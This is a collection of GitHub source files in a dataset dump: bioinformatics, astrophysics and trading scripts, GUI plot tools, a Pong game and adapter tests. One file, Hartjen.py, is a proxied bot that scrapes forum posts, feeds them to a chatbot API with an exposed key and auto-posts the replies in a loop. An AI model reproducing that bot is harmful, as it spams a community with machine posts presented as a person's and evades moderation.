None\n","repo_name":"Shell1010/Aeterna-Selfbot","sub_path":"data/exts/Util.py","file_name":"Util.py","file_ext":"py","file_size_in_byte":10114,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
+{"seq_id":"71727640221","text":"'''\n This script takes the hhsearch blasttab files result of comparing the OG profiles\n between them, and returns a unique file with three columns: query OG, hit OG and evalue.\n Notice that the name of the query OG in the files is the name of the first sequence\n in its alignment, so I have to pick the filename up, that contains the name of the OG\n'''\n\nimport glob\nimport argparse\nimport os\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='')\n\n requiredArgs = parser.add_argument_group(\"Required Arguments\")\n\n requiredArgs.add_argument('-t', '--OG_blasttab_dir',\n dest='tab_dir',\n required=True,\n help='directory with the tables resulting from running hhsearch, '\n 'one profile vs the others'\n )\n requiredArgs.add_argument('-o', '--output_file',\n dest='out_file',\n required=True,\n help='file to store the 3 columns outfile usable by MCL'\n )\n\n return parser.parse_args()\n\n\ndef main():\n\n args = parse_args()\n\n tow = list()\n\n tables = glob.glob(f\"{args.tab_dir}/*.tab\")\n for table in tables:\n # remove all the tags from the file to retain only the OG_id\n query_OG = os.path.basename(table).split(\".tab\")[0]\n\n # read file\n # discard first line since it is the hit to itself\n lines = [line.strip().split(\"\\t\") for line in open(table).readlines()[1:]]\n for line in lines:\n if float(line[-2]) < 0.01:\n tow.append([query_OG, line[1], line[-2]])\n\n with open(args.out_file, \"w\") as fout:\n for hit in tow:\n fout.write(\"\\t\".join(hit) + \"\\n\")\n\n\n\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dcarrillouu/PhageAnnotation","sub_path":"scripts/broccoli/hhsearch_to_MCL.py","file_name":"hhsearch_to_MCL.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"40214853493","text":"from movingAverage import movingAverage as MA\nimport numpy as np\nimport pandas as pd \nfrom datetime import datetime\nimport pandas_datareader as web\nimport matplotlib.pyplot as plt\nimport matplotlib\nfrom macd import MACD\nfrom AverageTrueRange import ADX\nfrom rsi import RSI\nfrom evolution import *\nfrom os import system\nfrom ProgressBar import printProgressBar\ndef getResult(sigClass,df,scaler):\n # Input the data frame\n sigClass.setDF( df)\n # Set the scaler(Could be any float)\n sigClass.setScalar(scaler)\n # Get the distance from the moving average\n sigClass.predict()\n # Return the MA\n return sigClass.getDF()\ndef getMAsig(df, window, scaler, key = \"mainMA\"):\n # Set up the moving average\n Average = MA(window,key)\n return getResult(Average,df,scaler)\n\ndef getMACDSig(df, short, long, scaler, key = \"mainMA\"):\n # Set up the moving average\n Average = MACD(key, short, long)\n return getResult(Average,df,scaler)\n\ndef getADXsig(df, key,scaler = 6):\n # Set up the Average true range; this generates buy/sell signals based on how STRONG a trend is \n Average = ADX(key, scaler)\n return getResult(Average,df,scaler)\n\ndef getRSIsig(df,key,scaler = 1):\n # Set up the moving average\n Average = RSI(key, scaler)\n return getResult(Average,df,scaler)\n\ndef plot(key, df, show = True, labelx = 'Distributions:'):\n df[key].plot(label=labelx)\n\n plt.legend(loc='best')\n plt.grid(True)\n plt.title('Positions')\n if(show):\n plt.show()\n\n\n\ndef getCombinedDF(minMA = 50,address = 'aba.nz'):\n keys = []\n key = \"mainMA\"\n df=web.DataReader(address, data_source = 'yahoo', start = '2012-01-01', end = datetime.today().strftime('%Y-%m-%d'))\n MADist = getMAsig(df, minMA, 1, key)\n plot(key, MADist, show = False, labelx = 'MA')\n keys.append(key) \n key = \"MACD\"\n MACDsig = getMACDSig(df, 6,9,0.08,key)\n plot(key,MACDsig,show = False,labelx = 'MACD')\n keys.append(key)\n key = \"ADX\"\n ADXsig = getADXsig(df,key)\n plot(key,ADXsig,show = False, labelx = 'ADX')\n keys.append(key)\n key = \"RSI\"\n RSIsig = getRSIsig(df,key)\n plot(key,RSIsig,show = False, labelx = 'RSI')\n keys.append(key)\n # Reset the DF\n df=web.DataReader(address, data_source = 'yahoo', start = '2012-01-01', end = datetime.today().strftime('%Y-%m-%d'))\n sigDF = MADist\n sigDF[\"MACD\"] = MACDsig\n sigDF[\"ADX\"]= ADXsig\n sigDF[\"RSI\"] = RSIsig \n sigDF[\"High\"] = df['High']\n sigDF[\"Low\"] = df['Low']\n sigDF[\"Volume\"] = df['Volume']\n sigDF[\"Open\"] = df['Open']\n # Remove invalid data points\n # Remember: Remove the initial values from the DF. 
if you have NAN numbers it will damage the AI\n sigDF = sigDF[minMA:]\n # print(sigDF)\n return (sigDF.to_numpy(),keys)\n\nclass sigGen:\n def __init__(self, df):\n self.df = df\n self.bool = True\n def onclick(self,event):\n if(self.bool):\n self.bool = False\n self.df.loc[matplotlib.dates.num2date(event.xdata)] = 1\n else:\n self.bool = True\n self.df.loc[matplotlib.dates.num2date(event.xdata)] = -1\n print('double' if event.dblclick else 'single', event.button,\n event.x, event.y, matplotlib.dates.num2date(event.xdata), event.ydata)\n def getDF(self):\n return self.df\n\nif __name__ == \"__main__\":\n minMA = 50\n data=web.DataReader('aba.nz', data_source = 'yahoo', start = '2012-01-01', end = datetime.today().strftime('%Y-%m-%d'))[\"Close\"][minMA:]\n template = data.apply(lambda a : 0)\n close = data.to_numpy()\n\n sigDF,keys = getCombinedDF(minMA)\n start = 1\n end = 100\n numGenerations = 50\n algo = evolver(num_inputs = len(keys) ,num_hidden = 100,pop_size = 100, template = template)\n printProgressBar(0, numGenerations, prefix = 'Progress:', suffix = 'Complete', length = 50)\n\n for j in range(numGenerations):\n for i in range(len(sigDF)-1):\n algo.propogate(sigDF[i],close[i],i)\n algo.calcFitness(close[-1])\n if(algo.population[0].bank+algo.population[0].shares*close[-1] > 2000):\n break\n # results = [(algo.population[x].bank+algo.population[x].shares*close[-1]) for x in range(len(algo.population))]\n results = algo.population[0].bank+algo.population[0].shares*close[i]\n transacs = algo.population[0].transactions\n \n algo.repopulate()\n # system(\"cls\")\n \n \n printProgressBar(j + 1, numGenerations, prefix = 'Progress:', suffix = 'Complete', length = 50) \n print(\"\\nTop Earner: \",results)\n print(\"Transactions: \",transacs)\n \n \n\n \n \n # Plot the result of a generation\n fig=plt.figure()\n ax=fig.add_subplot(111)\n data.plot(label=\"close\")\n ax.plot(algo.population[0].df.loc[algo.population[0].df==1].index,data[ algo.population[0].df.loc[algo.population[0].df==1].index],label='BUY',lw=0,marker='^',c='g')\n ax.plot(algo.population[0].df.loc[algo.population[0].df==-1].index,data[ algo.population[0].df.loc[algo.population[0].df==-1].index],label='SELL',lw=0,marker='v',c='r')\n # ax.plot(algo.population[0].df==-1,label='SHORT',lw=0,marker='v',c='r')\n plt.show()\n\n ","repo_name":"FireAndIceFrog/NZXPredictor","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":5226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"37560216242","text":"\"\"\"\nThis script compute all alms squared windows, it's a necessary step of covariance computation.\n\"\"\"\nfrom pspy import so_dict, so_map, sph_tools, so_spectra, pspy_utils, so_mpi\nfrom pspipe_utils import pspipe_list\nimport numpy as np\nimport sys\n\n\ndef mult(map_a, map_b):\n\n res_a = 1 / map_a.data.pixsize()\n res_b = 1 / map_b.data.pixsize()\n\n if res_a == res_b:\n prod = map_a.copy()\n prod.data *= map_b.data\n elif res_a < res_b:\n print(\"resample map a\")\n prod = map_b.copy()\n map_a_proj = so_map.car2car(map_a, map_b)\n prod.data *= map_a_proj.data\n elif res_b < res_a:\n print(\"resample map b\")\n prod = map_a.copy()\n map_b_proj = so_map.car2car(map_b, map_a)\n prod.data *= map_b_proj.data\n \n return prod\n\n\nd = so_dict.so_dict()\nd.read_from_file(sys.argv[1])\n\nsurveys = d[\"surveys\"]\nlmax = d[\"lmax\"]\nniter = d[\"niter\"]\nsq_win_alms_dir = \"sq_win_alms\"\n\npspy_utils.create_directory(sq_win_alms_dir)\n\nn_sq_alms, sv1_list, ar1_list, sv2_list, ar2_list = pspipe_list.get_spectra_list(d)\n\n\nprint(\"number of sq win alms to compute : %s\" % n_sq_alms)\nso_mpi.init(True)\nsubtasks = so_mpi.taskrange(imin=0, imax=n_sq_alms - 1)\nprint(subtasks)\nfor task in subtasks:\n task = int(task)\n sv1, ar1, sv2, ar2 = sv1_list[task], ar1_list[task], sv2_list[task], ar2_list[task]\n\n win_T1 = so_map.read_map(d[\"window_T_%s_%s\" % (sv1, ar1)])\n win_T2 = so_map.read_map(d[\"window_T_%s_%s\" % (sv2, ar2)])\n\n sq_win = mult(win_T1, win_T2)\n #sq_win = win_T1.copy()\n #sq_win.data[:] *= win_T2.data[:]\n sqwin_alm = sph_tools.map2alm(sq_win, niter=niter, lmax=lmax)\n \n np.save(\"%s/alms_%s_%sx%s_%s.npy\" % (sq_win_alms_dir, sv1, ar1, sv2, ar2), sqwin_alm)\n\n","repo_name":"sgiardie/PSpipe","sub_path":"project/data_analysis/python/get_sq_windows_alms.py","file_name":"get_sq_windows_alms.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"69"}
+{"seq_id":"31556999657","text":"from numpy import array\n\nfrom enable.api import KeySpec, BaseTool\nfrom traits.api import Instance\nfrom chaco.tools.api import PanTool, ZoomTool, LineInspector\nfrom chaco.tools.tool_states import PanState\nfrom chaco.api import AbstractOverlay\n\nclass PanToolWithHistory(PanTool):\n def __init__(self, *args, **kwargs):\n self.history_tool = kwargs.get('history_tool', None)\n if 'history_tool' in kwargs:\n del kwargs['history_tool']\n super(PanToolWithHistory, self).__init__(*args, **kwargs)\n \n\n def _start_pan(self, event, capture_mouse=False):\n super(PanToolWithHistory, self)._start_pan(event, capture_mouse=False)\n if self.history_tool is not None:\n self._start_pan_xy = self._original_xy\n # Save the current data range center so this movement can be\n # undone later.\n self._prev_state = self.history_tool.data_range_center()\n\n def _end_pan(self, event):\n super(PanToolWithHistory, self)._end_pan(event)\n if self.history_tool is not None:\n # Only append to the undo history if we have moved a significant\n # amount. This avoids conflicts with the single-click undo\n # function.\n new_xy = array((event.x, event.y))\n old_xy = array(self._start_pan_xy)\n if any(abs(new_xy - old_xy) > 10):\n next = self.history_tool.data_range_center()\n prev = self._prev_state\n if next != prev:\n self.history_tool.append_state(PanState(prev, next))\n\n\nclass KeyboardPanTool(PanToolWithHistory):\n \"\"\"Allow panning with the keyboard arrow keys\"\"\"\n\n left_key = Instance(KeySpec, args=(\"Left\",))\n right_key = Instance(KeySpec, args=(\"Right\",))\n up_key = Instance(KeySpec, args=(\"Up\",))\n down_key = Instance(KeySpec, args=(\"Down\",))\n\n\n def normal_key_pressed(self, event):\n x, y = (0, 0)\n pan_amount = 40\n if self.left_key.match(event):\n x += pan_amount\n elif self.right_key.match(event):\n x -= pan_amount\n elif self.up_key.match(event):\n y -= pan_amount\n elif self.down_key.match(event):\n y += pan_amount\n\n if x or y:\n self._start_pan(event)\n (event.x, event.y) = (self._original_xy[0] + x, self._original_xy[1] + y)\n self.panning_mouse_move(event)\n self._end_pan(event)\n\n\nclass PointerControlTool(BaseTool):\n \"\"\"Allow the pointer inside the bounds of a plot to be different to the\n pointer outside the bounds.\"\"\"\n def __init__(self, inner_pointer='arrow', *args, **kwargs):\n super(PointerControlTool, self).__init__(*args, **kwargs)\n # self.pointer defined in BaseTool\n self.inner_pointer = inner_pointer\n\n def normal_mouse_move(self, event):\n def within_bounds(component, x, y):\n if component is None:\n return False\n width, height = component.bounds\n left, top = component.x, component.y\n right, bottom = left + width, top + height\n return x >= left and x <= right and y >= top and y <= bottom\n\n if event.window:\n if within_bounds(self.component, event.x, event.y):\n # Apparently there's not a better way...\n event.window.set_pointer(self.inner_pointer)\n else:\n event.window.set_pointer(self.pointer)\n\n\nclass ClickUndoZoomTool(ZoomTool):\n def __init__(self, component=None, undo_button='right', *args, **kwargs):\n super(ClickUndoZoomTool, self).__init__(component, *args, **kwargs)\n self.undo_button = undo_button\n self._reverting = False\n self.minimum_undo_delta = 3\n\n def normal_left_down(self, event):\n \"\"\" Handles the left mouse button being pressed while the tool is\n in the 'normal' state.\n\n If the tool is enabled or always on, it starts selecting.\n \"\"\"\n if self.undo_button == 'left':\n 
self._undo_screen_start = (event.x, event.y)\n        super(ClickUndoZoomTool, self).normal_left_down(event)\n\n    def normal_right_down(self, event):\n        \"\"\" Handles the right mouse button being pressed while the tool is\n        in the 'normal' state.\n\n        If the tool is enabled or always on, it starts selecting.\n        \"\"\"\n        if self.undo_button == 'right':\n            self._undo_screen_start = (event.x, event.y)\n        super(ClickUndoZoomTool, self).normal_right_down(event)\n\n    def normal_left_up(self, event):\n        if self.undo_button == 'left':\n            if self._mouse_didnt_move(event):\n                self.revert_history()\n\n    def normal_right_up(self, event):\n        if self.undo_button == 'right':\n            if self._mouse_didnt_move(event):\n                self.revert_history()\n\n    def selecting_left_up(self, event):\n        self.normal_left_up(event)\n        super(ClickUndoZoomTool, self).selecting_left_up(event)\n\n    def selecting_right_up(self, event):\n        self.normal_right_up(event)\n        super(ClickUndoZoomTool, self).selecting_right_up(event)\n\n    def _mouse_didnt_move(self, event):\n        start = array(self._undo_screen_start)\n        end = array((event.x, event.y))\n        return all(abs(end - start) == 0)\n\n    def clear_undo_history(self):\n        self._history_index = 0\n        self._history = self._history[:1]\n\n    def revert_history(self):\n        if self._history_index > 0:\n            self._history_index -= 1\n            self._prev_state_pressed()\n\n    def revert_history_all(self):\n        self._history_index = 0\n        self._reset_state_pressed()\n\n    def _get_mapper_center(self, mapper):\n        bounds = mapper.range.low, mapper.range.high\n        return bounds[0] + (bounds[1] - bounds[0])/2.\n\n    def data_range_center(self):\n        x_center = self._get_mapper_center(self._get_x_mapper())\n        y_center = self._get_mapper_center(self._get_y_mapper())\n        return x_center, y_center\n\n    def append_state(self, state):\n        self._append_state(state, set_index=True)\n\n\n# Even though it is an overlay, LineInspector doesn't seem to inherit\n# from AbstractOverlay. TraitsTool rightly assumes that it does, so\n# double-clicking a plot with a LineInspector overlay causes a traceback.\n# https://github.com/enthought/chaco/issues/72\nclass LineInspectorTool(LineInspector, AbstractOverlay):\n    pass\n","repo_name":"AustralianSynchrotron/pdviper","sub_path":"tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":6426,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"69"}
+{"seq_id":"39729120253","text":"import pygame\n\nfrom utils.constant import *\nfrom utils.platform import Platform\nfrom utils.ball import Ball\n\npygame.init()\n\nSCREEN = pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption('Pong!')\n\nplatform_group = pygame.sprite.Group()\nball_group = pygame.sprite.GroupSingle()\n\nr_lose, l_lose = 3, 3\nspeed = 5\nfont = pygame.font.SysFont('Arial', 40)\n\ndef font_set(l_lose, r_lose):\n global font\n font_l = font.render(f'{l_lose}', 1, 'White')\n font_r = font.render(f'{r_lose}', 1, 'White')\n font_l_rect = font_l.get_rect(topleft=(10, 10))\n font_r_rect = font_l.get_rect(topright=(WIDTH - 10, 10))\n SCREEN.blit(font_l, font_l_rect)\n SCREEN.blit(font_r, font_r_rect)\n \n\ndef losing(ball_group):\n global end_screen, r_lose, l_lose, speed\n\n if l_lose == 0 or r_lose == 0:\n r_lose, l_lose = 3, 3\n end_screen = True\n speed = 5\n\n\n if ball_group:\n if ball_group.sprite.rect.left >= WIDTH:\n r_lose -= 1\n speed += 2\n ball_group.sprite.kill()\n ball_w = Ball(platform_group, speed)\n ball_group.add(ball_w)\n \n elif ball_group.sprite.rect.right <= 0:\n l_lose -= 1\n speed += 2\n ball_group.sprite.kill()\n ball_w = Ball(platform_group, speed)\n ball_group.add(ball_w)\n\n\n return l_lose, r_lose, end_screen\n\n\ndef main():\n global end_screen, speed\n platform_l = Platform(100, HEIGHT//2, 'left')\n platform_r = Platform(WIDTH - 100, HEIGHT//2, 'right')\n platform_group.add(platform_l, platform_r)\n\n ball_w = Ball(platform_group, speed)\n ball_group.add(ball_w)\n\n clock = pygame.time.Clock()\n\n while True:\n clock.tick(FPS)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n end_screen = False\n \n if not end_screen:\n SCREEN.fill('Black')\n l_lose, r_lose, end_screen = losing(ball_group)\n font_set(l_lose, r_lose)\n\n platform_group.draw(SCREEN)\n platform_group.update()\n\n ball_group.draw(SCREEN)\n ball_group.update()\n else:\n\n SCREEN.fill('Black')\n if l_lose == 0:\n lose_font = font.render(f'Gracz prawy wygrał!', 1, 'White')\n lose_font_rect = lose_font.get_rect(center=(WIDTH//2, HEIGHT//2))\n SCREEN.blit(lose_font, lose_font_rect)\n else:\n lose_font = font.render(f'Gracz lewy wygrał!', 1, 'White')\n lose_font_rect = lose_font.get_rect(center=(WIDTH//2, HEIGHT//2))\n SCREEN.blit(lose_font, lose_font_rect)\n\n pygame.display.update()\n\nif __name__ == '__main__':\n end_screen = False\n main()","repo_name":"Ognaseon/pong-game-","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"2704325971","text":"import json\nimport re\n\nfrom typing import TYPE_CHECKING, List\nfrom unittest.mock import patch\n\nimport pytest\n\nfrom deker.arrays import VArray\nfrom deker.ctx import CTX\nfrom pytest_httpx import HTTPXMock\n\nfrom deker_server_adapters.array_adapter import ServerArrayAdapter\nfrom deker_server_adapters.errors import FilteringByIdInClusterIsForbidden\nfrom deker_server_adapters.varray_adapter import ServerVarrayAdapter\n\n\nif TYPE_CHECKING:\n from httpx import Request\n\n\ndef test_get_node_by_id(varray: VArray, server_varray_adapter: ServerVarrayAdapter, nodes_urls: List[str]):\n with patch.object(varray, \"primary_attributes\", {}):\n # Check window slides\n\n node = server_varray_adapter.get_host_url(server_varray_adapter.get_node(varray))\n assert node in nodes_urls\n\n\ndef test_get_node_by_primary(varray: VArray, server_varray_adapter: ServerVarrayAdapter, nodes_urls: List[str]):\n with patch.object(varray, \"primary_attributes\", {\"foo\": \"bar\"}):\n # Check window slides\n\n node = server_varray_adapter.get_host_url(server_varray_adapter.get_node(varray))\n assert node in nodes_urls\n\n\ndef test_get_node_give_same_result(varray: VArray, server_varray_adapter: ServerVarrayAdapter):\n first_node = server_varray_adapter.get_node(varray)\n for _ in range(10):\n node = server_varray_adapter.get_node(varray)\n assert node == first_node\n\n\ndef test_array_generate_id(\n varray: VArray,\n server_varray_adapter: ServerVarrayAdapter,\n httpx_mock,\n collection,\n server_array_adapter: ServerArrayAdapter,\n):\n httpx_mock.add_response(method=\"POST\", json=varray.as_dict, status_code=201)\n data = varray.as_dict\n data.update({\"id\": None, \"id_\": None, \"primary_attributes\": None})\n server_varray_adapter.create(\n {\n **data,\n \"adapter\": server_varray_adapter,\n \"collection\": collection,\n \"array_adapter\": server_array_adapter,\n }\n )\n requests: List[Request] = httpx_mock.get_requests()\n for request in requests:\n if request.method == \"POST\":\n assert json.loads(request.content.decode())[\"id_\"]\n\n\ndef test_read_meta_success(varray: VArray, httpx_mock: HTTPXMock, server_varray_adapter: ServerArrayAdapter, ctx: CTX):\n node = server_varray_adapter.get_host_url(server_varray_adapter.get_node(varray))\n httpx_mock.add_response(\n json=varray.as_dict,\n method=\"GET\",\n url=re.compile(f\"{node}/v1/collection/{varray.collection}/varray/by-id/{varray.id}\"),\n )\n assert server_varray_adapter.read_meta(varray) == json.loads(json.dumps(varray.as_dict))\n\n\ndef test_filter_by_id_is_not_allowed(varray_collection_with_primary_attributes):\n with pytest.raises(FilteringByIdInClusterIsForbidden):\n varray_collection_with_primary_attributes.filter({\"id\": \"foo\"}).last()\n","repo_name":"openweathermap/deker-server-adapters","sub_path":"tests/test_cases/test_cluster/test_varray_adapters.py","file_name":"test_varray_adapters.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"3604765874","text":"import requests\r\nfrom selenium.webdriver.firefox.options import Options as FirefoxOptions\r\nfrom selenium import webdriver\r\nimport sys\r\nimport json\r\nimport os\r\nimport random\r\nimport time\r\n\r\n##Proxy settings on by default\r\nPROXY = \"p.webshare.io:19999\"\r\nwebdriver.DesiredCapabilities.FIREFOX['proxy'] = {\r\n \"httpProxy\": PROXY,\r\n \"ftpProxy\": PROXY,\r\n \"sslProxy\": PROXY,\r\n \"proxyType\": \"MANUAL\",\r\n\r\n}\r\n\r\nwhile True:\r\n ##Images\r\n path = \"/root/home/selenium/Cirno/\"\r\n random_filename = random.choice([\r\n x for x in os.listdir(path)\r\n if os.path.isfile(os.path.join(path, x))\r\n ])\r\n\r\n myrandomfile = (path + random_filename)\r\n\r\n ##Main\r\n options = FirefoxOptions()\r\n options.add_argument(\"-headless\")\r\n\r\n driver = webdriver.Firefox(options=options)\r\n\r\n driver.get(\"http://www.tokyochronos.net/cute/thread/2579/\")\r\n\r\n ##Find last post in thread\r\n elements = driver.find_elements_by_xpath(\"//div[contains(@class, 'text')]\")\r\n size = len(elements)\r\n target_element = elements[size - 1]\r\n ##Pokemon stuff\r\n\r\n mystfuline = (target_element.text)\r\n\r\n mystfulinestripped = (mystfuline).lstrip()\r\n driver.close()\r\n\r\n my_humanresponse = print(mystfulinestripped)\r\n\r\n r = requests.get(f'https://www.personalityforge.com/api/chat/?apiKey=XbNsywHwMMemhr0C&chatBotID=63906&message={my_humanresponse}&externalID=qwe-669669946&firstName=Arc&lastName=Hatewise&gender=m')\r\n\r\n myprintvar = print(r.json())\r\n\r\n myJson = str(r.content)\r\n\r\n original_stdout = sys.stdout\r\n\r\n\r\n #write PFbot response\r\n with open('tay_response.json', 'w') as f:\r\n sys.stdout = f\r\n print(r.text)\r\n sys.stdout = original_stdout\r\n\r\n with open('tay_response.json') as json_file:\r\n data = json.load(json_file)\r\n\r\n myTayresponse = data['message']['message']\r\n\r\n print(myTayresponse)\r\n\r\n ##Fuuka functionality\r\n\r\n driver = webdriver.Firefox(options=options)\r\n\r\n driver.get(\"http://www.tokyochronos.net/cute/thread/2579/\")\r\n\r\n replybox = driver.find_element_by_id(\"reply_chennodiscursus\")\r\n replybox.send_keys(myTayresponse)\r\n\r\n replyboxN = driver.find_element_by_id(\"reply_bokunonome\")\r\n replyboxN.send_keys(\"Hartjen#clingy\")\r\n\r\n replyboxFile = driver.find_element_by_id(\"file_image\")\r\n replyboxFile.send_keys(myrandomfile)\r\n\r\n element = driver.find_element_by_xpath(\r\n \"/html/body/div[2]/div[2]/article[1]/div[7]/section/form/fieldset/div[3]/div/input[1]\").click()\r\n time.sleep(180)\r\n print(\"Sleeping\", 22, \"...\")\r\n driver.close()\r\n","repo_name":"w2-seraph/Arc_linux","sub_path":"Hartjen.py","file_name":"Hartjen.py","file_ext":"py","file_size_in_byte":2562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"11528411048","text":"from django.contrib import admin\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom openzaak.utils.admin import UUIDAdminMixin\n\nfrom ..models import CheckListItem, StatusType\nfrom .mixins import CatalogusContextAdminMixin, ReadOnlyPublishedZaaktypeMixin\n\n\nclass ChecklistItemInline(admin.TabularInline):\n model = CheckListItem\n fields = (\n \"itemnaam\",\n \"vraagstelling\",\n \"verplicht\",\n \"toelichting\",\n )\n extra = 1\n\n\n@admin.register(StatusType)\nclass StatusTypeAdmin(\n ReadOnlyPublishedZaaktypeMixin,\n UUIDAdminMixin,\n CatalogusContextAdminMixin,\n admin.ModelAdmin,\n):\n model = StatusType\n\n # List\n list_display = (\"statustype_omschrijving\", \"statustypevolgnummer\", \"zaaktype\")\n list_filter = (\"zaaktype\", \"informeren\")\n search_fields = (\n \"uuid\",\n \"statustype_omschrijving\",\n \"statustype_omschrijving_generiek\",\n \"statustypevolgnummer\",\n )\n ordering = (\"zaaktype\", \"statustypevolgnummer\")\n\n # Details\n fieldsets = (\n (\n _(\"Algemeen\"),\n {\n \"fields\": (\n \"statustype_omschrijving\",\n \"statustype_omschrijving_generiek\",\n \"statustypevolgnummer\",\n \"informeren\",\n \"statustekst\",\n \"toelichting\",\n \"datum_begin_geldigheid\",\n \"datum_einde_geldigheid\",\n )\n },\n ),\n (_(\"Relaties\"), {\"fields\": (\"zaaktype\",)}),\n )\n inlines = [ChecklistItemInline]\n raw_id_fields = (\"zaaktype\",)\n readonly_fields = (\"uuid\",)\n","repo_name":"open-zaak/open-zaak","sub_path":"src/openzaak/components/catalogi/admin/statustype.py","file_name":"statustype.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"69"}
+{"seq_id":"35798096701","text":"import setuptools\n\nwith open(\"DESCRIPTION\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"lightfly\",\n version=\"0.1.6\",\n author=\"Weinan Tang\",\n license=\"GPLv3\",\n author_email=\"twn39@163.com\",\n description=\"A finance platform for china.\",\n install_requires=[\n 'requests>=2.0',\n 'pandas >= 0.20'\n ],\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/pypa/sampleproject\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: GNU Affero General Public License v3\",\n \"Operating System :: OS Independent\",\n \"Natural Language :: Chinese (Simplified)\",\n \"Topic :: Scientific/Engineering :: Mathematics\"\n ],\n)","repo_name":"lightfly-finance/lightfly-py","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"4010143497","text":"from collections import defaultdict\nfrom string import ascii_lowercase\n\nclass Solution:\n def groupAnagrams(self, strs: List[str]) -> List[List[str]]:\n hashmap = defaultdict(list)\n alphabet_idx_map = {alph:idx for idx, alph in enumerate(ascii_lowercase)}\n for strng in strs:\n key = [0 for _ in range(len(ascii_lowercase))]\n for char in strng:\n char_idx = alphabet_idx_map[char]\n key[char_idx] += 1\n hashmap[str(key)].append(strng)\n \n return hashmap.values()\n \n ","repo_name":"SaheedAde/LeetcodeDSA","sub_path":"0049-group-anagrams/0049-group-anagrams.py","file_name":"0049-group-anagrams.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"72187904221","text":"#Battle Menu 2\n#The code for the menu that appears when Harry enters a battle with enemies\n#displays the actions he can take\n\nfrom pygame import*\nimport os\n\n#Window preferences\nos.environ['SDL_VIDEO_WINDOW_POS'] = '25,50' #Opens up in the upper left corner \nscreen = display.set_mode((850,600)) #Game window resolution\ndisplay.set_caption(\"Harry Potter: New Horizons\")\nmouse.set_cursor(*cursors.tri_left)\n\n#Already Loaded in main\nprofilePic = image.load (\"profilePic.png\")\n#*******\n\n#Load idle sprites, these lists hold the sprites for the animations of the enemies\n#during battle screens \nenemyIdleSpritesList = []\nenemyAttackSpritesList = [] \nenemyFrame = 0\n\nenemyMode = \"Attack\" #change to default Idle \n\nfor i in range (6):\n enemyIdleSpritesList.append(image.load(\"enemyIdleSprite\\\\enemyIdleSprite\"+str(i)+\".png\"))\n enemyIdleSpritesList[i] = transform.scale(enemyIdleSpritesList[i],(50,60))\n\nfor i in range (6):\n enemyAttackSpritesList.append(image.load(\"enemyAttackSprite\\\\enemyAttackSprite\"+str(i)+\".png\"))\n enemyAttackSpritesList[i] = transform.scale(enemyAttackSpritesList[i],(50,60))\n\nscreen.fill((0,0,0)) #replace later \n\nrunning = True\nwhile running:\n\n mb = mouse.get_pressed()\n mx,my = mouse.get_pos()\n\n for e in event.get(): \n if e.type == QUIT: \n running = False\n \n #Some variable that keeps track of whether or not harry in is a battle\n #Eg. triggered when harry walks into the blue blob \n #if gameMode == \"Battle\":\n\n if enemyMode == \"Attack\": #if the enemy is attacking:\n screen.fill((0,0,0))\n screen.blit(enemyAttackSpritesList[enemyFrame],(80,400))\n time.wait(100)\n enemyFrame +=1\n if enemyFrame>5:\n enemyFrame = 0\n enemyMode=\"Idle\" \n #Add code when harry finishes his move, the enemy attacks again\n \n elif enemyMode == \"Idle\": #if the enemy is not attacking:\n screen.fill((0,0,0))\n screen.blit(enemyIdleSpritesList[enemyFrame],(80,400))\n time.wait(80)\n enemyFrame +=1\n if enemyFrame>5:\n enemyFrame=0\n \n display.flip()\nquit()\n","repo_name":"DSchana/Final-Project-11","sub_path":"Compsci Final Project/battleMenu SPRITE (COMBINE WITH BATTLEMENU NEW).py.py","file_name":"battleMenu SPRITE (COMBINE WITH BATTLEMENU NEW).py.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
